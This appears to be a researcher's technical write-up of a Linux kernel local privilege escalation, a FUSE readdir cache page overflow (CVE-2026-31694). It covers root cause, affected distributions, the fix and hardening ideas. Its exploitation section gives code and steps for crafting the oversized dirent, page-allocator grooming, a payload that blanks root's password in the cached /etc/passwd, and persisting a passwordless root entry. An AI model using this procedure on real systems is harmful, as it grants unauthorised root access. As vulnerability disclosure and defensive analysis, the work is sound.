Unprivileged root via an out-of-bounds write in the FUSE readdir cache (CVE-2026-31694)

CVE-2026-31694 · Fixed in mainline (51a8de6), 20 April 2026, Cc: stable · Fixes 69e3455 · Latent since 69e3455 (2018) · Affected: v6.16 through the fix · Reported by Qi Tang and Zijun Hu · Fix authored by Samuel Page

Summary

A missing bounds check in fs/fuse/readdir.c lets an unprivileged local user write a controlled 24 bytes past the end of a kernel page and, by landing that write on a cached copy of /etc/passwd, escalate to root. fuse_add_dirent_to_cache() copies a directory entry whose length is taken from the server-controlled namelen field into a single page-cache page. The code checks whether the entry fits in the space remaining on the current page, and if not it advances to a fresh page, but it never checks whether the entry fits in a page at all. A FUSE daemon that returns a dirent with namelen=4095 produces a 4120-byte record, and the 24 bytes past PAGE_SIZE spill into whatever kernel page physically follows.

The FUSE daemon runs as the unprivileged user who mounted the filesystem, and mounting a FUSE filesystem needs no real privilege on a stock desktop, so the whole thing is reachable from an ordinary session with no capabilities, no setuid helper beyond the one every distro ships, and no container escape. The overflow lands in the page allocator’s direct map rather than in a slab object, which means KASAN stays silent and the interesting neighbour is not a heap structure but an adjacent page, including the page cache of a read-only file the kernel already trusts.

The bug is CVE-2026-31694. It was reported by Qi Tang and Zijun Hu and fixed by Samuel Page (with an assist from Bynario AI, per the commit tags), with the patch merged on 20 April 2026. What follows is my own root-cause analysis and exploitation of the bug. The reachability archaeology in particular is the part I find most worth telling.

An unprivileged local attack surface

The overflow happens when the kernel processes a READDIR reply from a FUSE daemon. The daemon is just a userspace program, running as whoever started it, so the question is only whether an unprivileged user can get a FUSE filesystem mounted and serve replies into the readdir cache. On a stock install there are two independent paths, and together they cover essentially every major distribution.

Path A: fusermount3 (setuid root, no namespaces needed)

fusermount3 is the small setuid-root helper that performs the privileged mount(2) on the user’s behalf. It ships by default anywhere GNOME does, because gvfs-fuse depends on fuse3, and gvfs-fuse is pulled in by the ubuntu-desktop metapackage and its equivalents. The specific distros where any unprivileged user can trigger the bug immediately with no setup:

  • Ubuntu (all desktop flavours): fuse3 installed as a dependency of gvfs-fuse, part of the ubuntu-desktop metapackage.
  • Fedora Workstation: fuse3 installed by default for GNOME, Toolbox and Open VM Tools. fusermount3 is present as a setuid-root binary in the default install.
  • Linux Mint: Ubuntu-based, inherits fuse3 via the same gvfs-fuse dependency chain.
  • Any GNOME-based desktop distribution: gvfs-fuse depends on fuse3, so any distro shipping a GNOME desktop will have fusermount3 available to unprivileged users.

The setuid bit is only needed for the initial mount(2) call. The vulnerable code path is entered later, when the user-controlled daemon serves a crafted dirent in response to a READDIR request from the kernel. Nothing about the helper’s hardening is in the way.

Path B: unprivileged user namespaces (no fusermount3 needed)

Since Linux 4.18, an unprivileged user can create a user + mount namespace (unshare -Ufirmp), gain CAP_SYS_ADMIN inside it, open /dev/fuse (typically mode 0666), and mount a FUSE filesystem directly without fusermount3 at all. The readdir overflow corrupts kernel page-cache memory globally regardless of namespace isolation. This path works on any distro that allows unprivileged user namespace creation:

  • Debian (Bullseye and later): kernel.unprivileged_userns_clone has been enabled by default since Debian 11.
  • Arch Linux: enabled by default on standard kernels (linux, linux-lts, linux-zen).
  • RHEL 9 / CentOS Stream 9 / Rocky / Alma: user.max_user_namespaces defaults to a non-zero value (~14803); unprivileged user namespaces are enabled out of the box.
  • Fedora (also covered by Path A on Workstation): enabled by default.

The combination of both paths covers essentially every major Linux distribution out of the box.

Why none of the mitigations work

AppArmor. Ubuntu 24.04 LTS added restrictions on unprivileged user namespaces, but fusermount3 is unconfined on 24.04, so Path A is unaffected. Ubuntu 24.10 and later ship an AppArmor profile for fusermount3 itself (/etc/apparmor.d/fusermount3), but the profile is a path-based allow-list of permitted mount targets. It explicitly permits FUSE mounts under $HOME and $XDG_RUNTIME_DIR (/run/user/$uid/), because GNOME, GVFS, SSHFS, Flatpak, AppImage, Docker-with-FUSE, and fstab-based FUSE mounts all require it. The exploit is insensitive to mount location; the overflow occurs in kernel page-cache memory when the daemon’s reply is processed, so any mount path the profile permits is sufficient to trigger it. Tightening the profile to deny all user-writable mount targets would break the Ubuntu desktop. The trajectory of fusermount3 profile changes throughout 2025 has been consistently toward more permissive, as legitimate workflows keep breaking.

SELinux. Default policies on RHEL and Fedora do not restrict unprivileged FUSE mounts via either fusermount3 or user namespaces.

seccomp. Not applied to regular user sessions.

The only configurations that actually stop the exploit are removing the setuid bit from fusermount3 and disabling unprivileged user namespaces, both of which break legitimate functionality (Snap, GVFS, SSHFS, rootless containers). No mainstream distro ships either.

So the threat model is the strong one: a normal logged-in user on a default desktop. If you can mount a FUSE filesystem, and you can, you can serve the dirent that triggers the bug.

The readdir cache

When a FUSE directory is opened with FOPEN_CACHE_DIR, the kernel caches the daemon’s directory listing in pages attached to the inode, so subsequent getdents calls can be served without round-tripping to userspace. The reply from the daemon is a packed stream of struct fuse_dirent records: a fixed 24-byte header (inode, offset, namelen, type) followed by namelen bytes of name, and fuse_add_dirent_to_cache() copies each record into the current cache page.

Each record’s serialized size is reclen = FUSE_DIRENT_SIZE(d), which is FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen), the header plus the name, rounded up to an 8-byte boundary. The cache is a sequence of PAGE_SIZE pages written at a running offset, and the only placement decision the function makes is whether the next record fits in what is left of the current page.

The bug: a check that never looks at the whole record

Stripped down, the copy looks like this:

/* fuse_add_dirent_to_cache(), simplified, pre-fix */

reclen = FUSE_DIRENT_SIZE(dirent);      /* FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen) */

if (offset + reclen > PAGE_SIZE) {       /* does it fit in what's left of this page? */
        index++;                        /* no: advance to a fresh page   */
        offset = 0;                     /*     and start at the top of it */
}

addr = kmap_local_page(page[index]) + offset;
memcpy(addr, dirent, reclen);           /* reclen is never compared to PAGE_SIZE itself */

The check answers one question (“does this record fit in the remaining space?”, and handles a “no” by moving to a clean page and resetting offset to 0. That is correct as long as a record can always fit in a page once it has one to itself. The function simply assumes that. It never asks whether reclen exceeds PAGE_SIZE, so when offset is reset to 0 and the memcpy runs, a record larger than a page writes straight off the end of the fresh page.

With namelen at the maximum the protocol now allows, that is exactly what happens:

reclen   = FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen)
         = FUSE_REC_ALIGN(24 + 4095)
         = 4120

overflow = 4120 - 4096 = 24 bytes

The overflowing 24 bytes are the tail of dirent->name[], which the daemon controls completely. So this is a linear, fixed-size, fully-controlled write off the end of one page into the start of the next.

A 24-byte write past the end of the page namelen=4095 makes the record larger than the page it is copied into. Not to scale. reclen = FUSE_REC_ALIGN(24 + 4095) = 4120 B readdir cache page 4096 B adjacent kernel page (page cache, e.g. /etc/passwd) PAGE_SIZE = 4096 24 B The check advances to a fresh page when the record will not fit the remaining space; it never rejects a record that cannot fit any single page.
A record larger than a page is copied at offset 0 of a fresh page; the tail spills into the next page.

Six years dormant: how the bug got armed

The interesting part of this bug is that the missing check is not new. It has been wrong since the readdir cache was introduced. It was simply unreachable for six years, and was quietly armed by a commit that had nothing to do with it.

The cache, and this exact fits-in-remaining-space check, arrived in commit 69e34551152a (“fuse: allow caching readdir”, Miklos Szeredi, October 2018, first in v4.20). At the time FUSE_NAME_MAX was 1024, so the largest record a daemon could produce was FUSE_REC_ALIGN(24 + 1024) = 1048 bytes, about a quarter of a page. A record could never approach PAGE_SIZE, so the absence of a reclen > PAGE_SIZE check made no difference. The assumption (“any single record fits in a page”) was true, just never written down.

It stopped being true in commit 27992ef80770d (“fuse: Increase FUSE_NAME_MAX to PATH_MAX”, Bernd Schubert, December 2024, first in v6.15). That change adds a per-connection fc->name_max, initialised to the old 1024 and raised to PATH_MAX - 1 (4095) after FUSE_INIT negotiation once the daemon advertises max_pages > 1. Since the daemon is attacker-controlled, that gate is no gate at all. The commit dutifully updates the length checks in fuse_notify_inval_entry, fuse_notify_delete and fuse_lookup_name to use the new limit, but it never touches fs/fuse/readdir.c, because nobody connected a name-length ceiling to a readdir-cache page-boundary check three files away. With the ceiling raised, reclen reaches 4120, and the latent 2018 bug becomes a 24-byte controlled overflow.

Latent for six years, armed by an unrelated commit The missing check shipped in 2018 but was unreachable until FUSE_NAME_MAX was raised in 2024. Oct 2018 · v4.20 69e3455 allow caching readdir: adds the cache + the check. NAME_MAX 1024. Dec 2024 · v6.15 27992ef raise FUSE_NAME_MAX to PATH_MAX. name_max 4095. readdir.c untouched. Apr 2026 51a8de6 reject oversized dirents. Adds reclen > PAGE_SIZE. Fix: S. Page. dormant: max reclen ≈ 1048 B ≤ page armed: max reclen 4120 B > page fixed latent, unreachable reachable / exploitable
A name-length ceiling raised in one file turned a six-year-old check in another into a page overflow.

Why the sanitizers stay quiet

The reflex with a kernel heap overflow is to reach for KASAN, and the reflex is wrong here. KASAN guards slab objects and stack frames with poisoned redzones and a quarantine on freed allocations: an overflow that runs off the end of a kmalloc object trips a redzone and gets a clean report. This overflow does neither. The readdir cache pages come from the page allocator, and the bytes that follow them in the direct map are simply the next page, not a slab object, not a redzone, nothing KASAN instruments. The 24-byte write crosses no boundary the sanitizer is watching, so it reports nothing.

The bug is both quiet and useful for the same reason. Fuzzing a FUSE daemon against a KASAN kernel will not flag it. The first visible symptom is downstream: a corrupted neighbour, an unexplained oops if the adjacent page was something the kernel needed, or nothing at all if the adjacent page was cached file data and you only changed its contents. Page-cache pages are valid targets, and rewriting one rewrites file contents the kernel will go on to trust.

Exploitation

This bug gives a constrained primitive: exactly 24 bytes, at a fixed offset (byte 0 of the page that physically follows the cache page), with content the daemon fully controls. It is not a write-what-where. There is no control over length, no freedom over placement within the victim page, and no ability to skip pages. It is a linear spill off one page into the next, and whether it is useful at all depends entirely on what sits at that next physical page frame.

A different kind of overflow

The exploitation shape here is fundamentally different from a slab overflow, and the difference dictates everything that follows.

In a slab overflow (the more common case) you are writing past the end of one kmalloc object into the header or body of the next object in the same cache. The victim is a struct, and the game is type confusion: you pick a target struct that lives in the same size class, spray it into adjacent slots, and corrupt specific fields (a function pointer, a refcount, a flags word). The allocator’s freelist ordering is your leverage, and your tooling (KASAN, SLUB debug, freelist randomisation) is designed around exactly this scenario.

Here the overflow does not land in a slab at all. The readdir cache pages are plain page-allocator pages (alloc_page(GFP_KERNEL)), and the 24 bytes that spill off the end land on whatever page is at the next physical page frame number in the kernel’s direct map. That is not a slab object with redzones; it is a raw 4096-byte page that could be anything: a page-cache page backing a file, an anonymous page belonging to a process, a page table page, a free page on a buddy list, or another slab page viewed from the outside rather than the inside. KASAN does not instrument the gaps between page-allocator pages, so the overflow is invisible to the sanitizer. And the target is not a struct field at a known offset within an object. It is the first 24 bytes of an entire page, meaning whatever data structure starts at that page’s base address gets its head overwritten.

So the interesting targets here are not kernel structs but kernel pages, and the most interesting kernel pages are the ones where overwriting byte 0 has a semantic effect the kernel will act on. That points directly at the page cache.

Why the page cache is the natural target

The page cache is the kernel’s in-memory copy of file data. When a process reads /etc/passwd, the kernel reads the block from disk into a page-cache page, and from then on every process that reads the same file, including the kernel itself during su and PAM authentication, reads from that cached page. The page is not copied per-reader; there is one shared copy, and its contents are trusted as authoritative until it is evicted or the file is written through the filesystem layer.

Corrupting a page-cache page does not write back to disk. It does not trip any filesystem permission check, because the corruption never passes through write(2) or the VFS. It does not mark the page dirty, because the modification happens through a direct-map alias rather than through the filesystem’s address space operations. The kernel simply does not know the page has changed. Every subsequent reader, including privileged daemons that parse the file to make security decisions, sees the corrupted version.

This is the same end state DirtyPipe (CVE-2022-0847) achieved, via a completely different mechanism. DirtyPipe abused a stale PIPE_BUF_FLAG_CAN_MERGE flag to trick the pipe subsystem into merging attacker data into a spliced page-cache page. It was a logic bug in pipe buffer management. This one is a memcpy that writes 24 bytes off the end of a page-allocator page. The route is different; the destination is the same: the cached page of a file you cannot write to, rewritten without the kernel noticing.

Why /etc/passwd and why 24 bytes is enough

The target file needs to satisfy three constraints: it must be small enough that its first page covers the interesting content, it must be read by a privileged process that will act on the corrupted data, and the corruption must be achievable in 24 bytes starting at byte 0 of the page. /etc/passwd is the textbook fit.

A stock /etc/passwd begins with the root entry on line 1. The format is colon-delimited: root:x:0:0:root:/root:/bin/bash\n. The x in the password field means “look in /etc/shadow.” If that field is empty (root::0:0:...), PAM treats the account as having no password, and on Ubuntu, Debian and Arch the default pam_unix configuration includes nullok, which accepts an empty password for su. So the goal is to replace the first line of /etc/passwd with a root entry whose password field is blank.

The overflow writes 24 bytes at byte 0 of the victim page, which is byte 0 of the file’s cached content, which is the start of line 1. Twenty-four bytes is enough to write a complete, parseable root entry with a blank password field and a valid shell:

root::0:0:x:.:\n#######\n
|____________| |______|
   new root     comment absorber (# hides the truncated remains of the old line)

That is 23 bytes of meaningful content plus a trailing newline to pad to the controlled region. The # characters on the second “line” begin a comment in the passwd format, absorbing whatever partial text remains from the old root entry so the file still parses cleanly. After the overflow, su root with an empty password returns a root shell.

Triggering the overflow

Before the page-level grooming matters at all, the exploit has to get the kernel to copy a 4120-byte dirent into a cache page. That requires a FUSE filesystem whose daemon speaks the right protocol version to unlock the raised name_max, and a readdir reply containing the oversized entry.

The daemon mounts the filesystem via fusermount3: fork, exec fusermount3 <mountpoint> with the _FUSE_COMMFD environment variable pointing at a socketpair, and receive the /dev/fuse file descriptor back over SCM_RIGHTS. From there the daemon handles FUSE requests by reading from the fd and writing replies back.

The critical negotiation happens in FUSE_INIT. The kernel sends its version and capability flags; the daemon replies with its own. The field that matters is max_pages: if the daemon advertises max_pages > 1, the kernel raises fc->name_max from the old 1024 to PATH_MAX - 1 (4095). Without this, parse_dirfile rejects names longer than 1024 and the overflow is unreachable. Setting it is one line in the init reply:

struct fuse_init_out out = {0};
out.major = FUSE_KERNEL_VERSION;
out.minor = FUSE_KERNEL_MINOR_VERSION;
out.max_pages = 2;              /* triggers name_max = PATH_MAX - 1 = 4095 */
out.max_write = 4096;
fuse_reply(unique, 0, &out, sizeof(out));

Once name_max is raised, the daemon needs to serve a directory whose listing triggers the cache path. It opens directories with FOPEN_CACHE_DIR set in the OPENDIR reply’s open_flags, telling the kernel to cache the listing in pages. Each attempt uses a fresh directory name (trigdir_1, trigdir_2, …) looked up via LOOKUP with a fresh node ID, so each readdir populates a new cache page and the exploit never writes into a page it has already overflowed.

The oversized dirent itself is a single struct fuse_dirent with namelen = 4095. The name is 4095 bytes of padding, with the 24-byte payload placed at exactly the position that will spill past the page boundary. The header is 24 bytes (FUSE_NAME_OFFSET), so byte 0 of the name starts at byte 24 of the record, and the page boundary falls at byte 4096 of the record, which is byte 4096 - 24 = 4072 of the name. Everything from name byte 4072 onward overflows into the adjacent page:

struct fuse_dirent *d = (struct fuse_dirent *)buf;
d->ino = 1000;
d->off = 1;
d->namelen = 4095;                           /* FUSE_NAME_MAX after INIT */
d->type = DT_REG;
memset(d->name, 'A', 4095);                 /* padding */
memcpy(d->name + (PAGE_SIZE - FUSE_NAME_OFFSET),  /* byte 4072 of name = byte 4096 of record */
       payload, 23);                         /* the 24 bytes that land on the next page */

The grooming window

The exploit needs a window between triggering the readdir and the daemon actually replying, a gap where it can set up the page-level grooming before the overflow runs. FUSE gives this for free, because the protocol is synchronous from the daemon’s perspective: the kernel writes a FUSE_READDIR request to the fd, and blocks the calling thread until the daemon writes a reply. The daemon controls when that reply happens.

The exploit forks the trigger into a separate thread that opens a directory under the mountpoint (which sends the READDIR to the daemon), while the daemon’s READDIR handler blocks on a condition variable instead of replying immediately. The main thread waits for a signal that the readdir has arrived, performs all the grooming (memory pressure, page eviction, pool setup) and only then signals the daemon to release its reply. The dirent is copied into the cache page at the exact moment the adjacent page is the one the exploit wants to hit:

/* daemon side: READDIR handler */
static void handle_readdir(struct fuse_in_header *h, void *body) {
    struct fuse_read_in *ri = body;
    if (ri->offset != 0) { fuse_reply(h->unique, 0, NULL, 0); return; }

    pthread_mutex_lock(&mtx);
    readdir_arrived = 1;
    pthread_cond_signal(&cond_arrived);          /* tell main: request is here     */
    while (!readdir_respond)
        pthread_cond_wait(&cond_respond, &mtx);  /* block until main says go       */
    readdir_respond = 0;
    readdir_arrived = 0;
    pthread_mutex_unlock(&mtx);

    fuse_reply(h->unique, 0, dirent_buf, 4120);  /* now reply with the oversized dirent */
}

This is the FUSE equivalent of the ioctl-staggering in the DRM exploit’s race calibration: it turns a timing-dependent operation into a sequenced one. The daemon does not race the kernel; it holds the kernel’s thread until the grooming is done, then releases the reply at the right moment.

Placement: getting the right page at PFN+1

The entire exploit reduces to one placement problem: at the instant the FUSE daemon replies with the oversized dirent, the page at PFN+1 relative to the readdir cache page must be the cached first page of /etc/passwd.

The page allocator’s default behaviour works against this: per-CPU partial (PCP) freelists buffer recently freed pages and hand them back in LIFO order, which randomises the physical relationship between consecutive allocations. But when the PCP lists are empty, allocations fall through to the buddy allocator, which splits higher-order blocks into physically contiguous pairs. Two consecutive alloc_page calls served from the same order-1 buddy split are guaranteed to be at adjacent PFNs, and a write off the end of one lands on the other.

So the strategy is: drain the PCP lists, then orchestrate the two allocations (the readdir cache page and the passwd page-cache page) so they come from the same split. The exploit does this in four stages.

First, drain. The exploit reads /proc/meminfo, computes roughly 10% of MemFree, and holds that much memory in large mmap(MAP_POPULATE) blocks. It is not a precision instrument; it just needs to exhaust the PCP freelists and force allocations down to the buddy path. The blocks are touched (a volatile write to the first and last page of each) to make sure they are faulted and actually consume physical pages:

long free_kb = /* from /proc/meminfo MemFree: line */;
int drain_nblocks = (free_kb / 10) * 1024 / DRAIN_BLOCK_SIZE;

for (int i = 0; i < drain_nblocks; i++) {
    drain[i] = mmap(NULL, DRAIN_BLOCK_SIZE,
                    PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    *(volatile char *)drain[i] = (char)i;                         /* fault first page  */
    *(volatile char *)(drain[i] + DRAIN_BLOCK_SIZE - PAGE_SIZE) = (char)i; /* fault last */
}

Second, pool. After the drain, the exploit allocates a pool of 128 single-page mmap(MAP_POPULATE) mappings. With the PCP lists empty, these come from buddy splits, and consecutive pool entries are likely at consecutive PFNs. The pool is a reservoir of adjacent page pairs the exploit can use:

for (int i = 0; i < POOL_SIZE; i++) {
    pool[i] = mmap(NULL, PAGE_SIZE,
                   PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    *(volatile char *)pool[i] = (char)i;
}

Third, target. The exploit picks a consecutive pair from the pool: pool[idx] (the “before” page, which will become the readdir cache page) and pool[idx+1] (the “after” page, which will become the passwd page). It evicts /etc/passwd from the page cache with posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED), then frees the “after” page with munmap. The next time anything reads /etc/passwd, the kernel allocates a fresh page for the cache, and with the PCP lists drained, that allocation is likely to land on the PFN just freed. A pread of one byte forces the re-fault:

int passwd_fd = open("/etc/passwd", O_RDONLY);
posix_fadvise(passwd_fd, 0, 0, POSIX_FADV_DONTNEED);   /* evict from page cache      */
munmap(pool[idx + 1], PAGE_SIZE);                       /* free the "after" PFN       */
pread(passwd_fd, &tmp, 1, 0);                           /* re-fault: passwd → after PFN */

Fourth, fire. The exploit frees the “before” page (munmap(pool[idx])) and then signals the daemon to release its readdir reply. The kernel allocates a cache page for the readdir data, and with the PCP drained that allocation is likely to land on the PFN just freed. The 4120-byte memcpy fills the cache page and spills 24 bytes into PFN+1, which is now the page-cache page of /etc/passwd.

Page-level grooming: three steps to adjacency Drain PCP, build a pool of buddy-split pairs, then swap the target page into position. 1. Pool from buddy splits (PCP drained) pool[n-1] pool[idx] pool[idx+1] pool[n+2] ← consecutive PFNs from same buddy split 2. Evict passwd, free pool[idx+1], re-fault → passwd lands on freed PFN pool[n-1] pool[idx] /etc/passwd page cache pool[n+2] ← DONTNEED + munmap + pread re-faults here 3. Free pool[idx], signal daemon → readdir overflows into passwd pool[n-1] readdir cache page /etc/passwd corrupted pool[n+2] 24 B overflow The readdir cache page lands on the freed “before” PFN. The memcpy runs 4120 bytes: 4096 fill the cache page, and 24 spill into the “after” PFN, now the page-cache page of /etc/passwd.
Build a pool of adjacent pages from buddy splits; swap the target into position; overflow into it.

Warmup and validation

Before attempting the real /etc/passwd corruption, the exploit runs a warmup phase to validate that the overflow is landing where it expects. It builds a dirent with a 23-byte marker string (DEADBEEF_OOB_WRITE_HIT!) as the payload instead of the passwd entry, and runs the same grooming sequence against its own pool pages: allocate a consecutive pair, write a known pattern into the “after” page, free the “before” page, trigger the readdir, and check whether the marker appeared at byte 0 of the “after” page. If it did, the adjacency assumption held and the overflow landed correctly.

The exploit runs five warmup rounds. If none hit, it aborts: the memory configuration is not cooperating and there is no point corrupting /etc/passwd probabilistically without first confirming the primitive works. If at least one hits, the system’s physical layout is favourable and the exploit switches to the real payload. This is the same “validate your primitive before committing” discipline as the DRM exploit’s leak-verification step: better to waste a few iterations confirming the setup than to fire the destructive payload into the wrong page.

Post-exploitation

After the overflow lands, the page-cache copy of /etc/passwd reads root::0:0:x:.: on its first line. su root with an empty password succeeds. The exploit backs up the original /etc/passwd before the first attempt (read into memory and written to /tmp/.passwd_backup), then uses the root shell to write a clean passwordless-root entry to disk (the first line replaced, the rest of the file preserved from the backup), drops the page cache with echo 3 > /proc/sys/vm/drop_caches so the corrupted cached page is discarded, and drops into an interactive root shell. The on-disk file now has a persistent passwordless root entry; the page-cache corruption is gone.

On the two systems I tested (a 1 GB QEMU guest running 7.0.0-rc4 and a bare-metal 16 GB Ubuntu 24.04 box on 6.17) the exploit lands root consistently within one to ten attempts. The variation comes from the inherent non-determinism of the page allocator under memory pressure; the median is around three attempts. Over repeated runs it has never failed outright, though the attempt count varies with system memory configuration and background allocation noise.

The fix

The fix is the one line the 2018 code was missing: before copying, reject any record that cannot fit in a single page.

 if (offset + reclen > PAGE_SIZE) {
+        if (reclen > PAGE_SIZE)
+                return;
         index++;
         offset = 0;
 }

No interface is reworked and nothing is restructured. The assumption that was always implicit (“a record fits in a page”) is simply made explicit and enforced. It is a smaller fix than the one the DRM change_handle bug needed, because there is nothing compound to serialise here; the function was only ever missing a comparison. The change landed upstream as 51a8de6c50bf9 (“fuse: reject oversized dirents in page cache”, authored by Samuel Page, signed off by Miklos Szeredi and Christian Brauner) on 20 April 2026, and was Cc’d to stable; the backports went out across the stable trees over the following weeks.

Stopping the class, not just the bug

Page-cache corruption is not a bug. It is a bug class, and at this point it is a prolific one. Numerous kernel vulnerabilities have been turned into root by silently rewriting cached file contents, and the routes have almost nothing in common except the destination.

DirtyCOW (CVE-2016-5195) exploited a race in the copy-on-write fault handler. DirtyPipe (CVE-2022-0847) exploited a stale PIPE_BUF_FLAG_CAN_MERGE flag in the pipe subsystem. Copy Fail (CVE-2026-31431) exploited an in-place optimisation in algif_aead to write four controlled bytes into any readable file’s page cache via AF_ALG and splice. The DirtyFrag family (CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-43503) found path after path through the networking stack where skb cloning and coalescing dropped the SKBFL_SHARED_FRAG safety flag, letting IPsec in-place decryption overwrite file-backed pages. The pedit COW bug (CVE-2026-46331) achieved the same result through traffic control. And this FUSE readdir overflow takes yet another route: a memcpy that runs off the end of a page-allocator page into an adjacent page-cache page in the direct map. Different subsystems, different bug classes, same end state: the in-memory copy of a security-critical file says something different from what is on disk, and the kernel trusts the cached version.

Each bug was fixed individually, and correctly. But fixing each new route one at a time is whack-a-mole. The routes are unbounded; the destination is not.

There is a targeted hardening that would close part of this. The config files that grant root when corrupted are a small, stable set: /etc/passwd, /etc/shadow, /etc/sudoers, the handful of files under /etc/pam.d/. They rarely change after provisioning. If the kernel made the direct-map alias of their page-cache pages read-only at the page-table level, every corruption attempt through the direct map would fault rather than silently succeed. A memcpy overflow, a pipe merge, a COW race, any future variant hitting those pages would take a page fault instead of rewriting the file. Handle that fault as a panic and you turn the LPE into a denial of service. A panic is better than a root shell.

The cost would be low for this narrow set. Legitimate writes to these files are infrequent (useradd, passwd), and those write paths could go through a dedicated writable alias without meaningful overhead. You would split a few huge pages in the direct map to mark individual 4K pages read-only, but the TLB cost is trivial when you are protecting a dozen files rather than an entire filesystem.

But this only closes the config-file vector. Copy Fail and the DirtyFrag family do not touch /etc/passwd at all. They corrupt the cached code of a setuid binary like /usr/bin/su, modifying the executable in memory so it runs attacker-controlled instructions the next time it is invoked. If config files are protected but setuid binaries are not, the attacker just takes the binary-corruption path instead. You have forced a pivot, not closed a door.

Closing the binary-corruption vector is harder. The set of “files that grant root if corrupted” expands from a dozen config files to every setuid binary, every shared library loaded by a privileged process, every PAM module, every polkit rule. At that scale you are no longer marking a few pages read-only; you are making the entire rootfs immutable, which is a different operating model. It already exists: Android and ChromeOS do it with dm-verity, Fedora Silverblue and NixOS use read-only root partitions, and the page-cache corruption bug class is one more argument in their favour. Short of that, IMA (Integrity Measurement Architecture) appraisal on exec can check binary integrity before running a setuid program, but it has its own costs (signing infrastructure, performance on first exec, policy maintenance) and it verifies the on-disk state rather than the in-memory state, so a page-cache-only corruption could still slip past depending on when the appraisal runs relative to the cache poisoning.

So the honest framing is: protecting config-file page-cache pages is a cheap, targeted hardening that would have stopped this FUSE exploit and DirtyPipe and any future variant that targets /etc/passwd. It would not have stopped Copy Fail or DirtyFrag. Stopping those needs either immutable rootfs or runtime integrity checking of cached executables, both of which exist but require a different OS model than most Linux distributions ship today. The page-cache corruption class will keep producing new routes until the kernel stops trusting cached contents unconditionally, and how far you go with that depends on how much of your filesystem you are willing to treat as untrusted memory.

A broader pattern

The shape of this bug is a length that crosses a trust boundary and is checked against the wrong thing. namelen comes from the FUSE daemon, which is untrusted even though it is “local”, and the size derived from it, reclen, is validated against the cursor (offset + reclen > PAGE_SIZE) but never against the capacity (reclen > PAGE_SIZE). A bounds check that compares a peer-controlled size to “how much room is left” silently assumes the size can never exceed the whole container. The moment that assumption is false, advancing to a fresh container does not save you. It just gives the oversized record a clean page to run off the end of.

The reachability story generalises into the more useful lesson. A check that is correct only because of a limit defined elsewhere is load-bearing on that limit, and nothing records the dependency. When FUSE_NAME_MAX was 1024, the missing reclen > PAGE_SIZE guard was invisible; raising the limit for an unrelated reason, in a different file, three years later, turned it into a page overflow without a single line of readdir.c changing. So the thing to grep for is not the overflow but the latent precondition: a fixed-capacity buffer that takes a size from an untrusted producer and checks it against a running offset rather than the capacity. One step out, any constant that silently bounds such a check, because the day someone raises it is the day every place that leaned on the old value becomes attack surface.


Credit where it is due: to Qi Tang and Zijun Hu for reporting the bug, to Samuel Page for writing the fix, and to Bernd Schubert and the FUSE maintainers for the work this analysis picks apart. CVE-2026-31694 is closed by the reclen check in mainline and across the stable trees. As ever with a peer-controlled-length bug, the only complete answer is to stop trusting the length. Proof of concept: github.com/0xCyberstan/CVE-2026-31694-POC.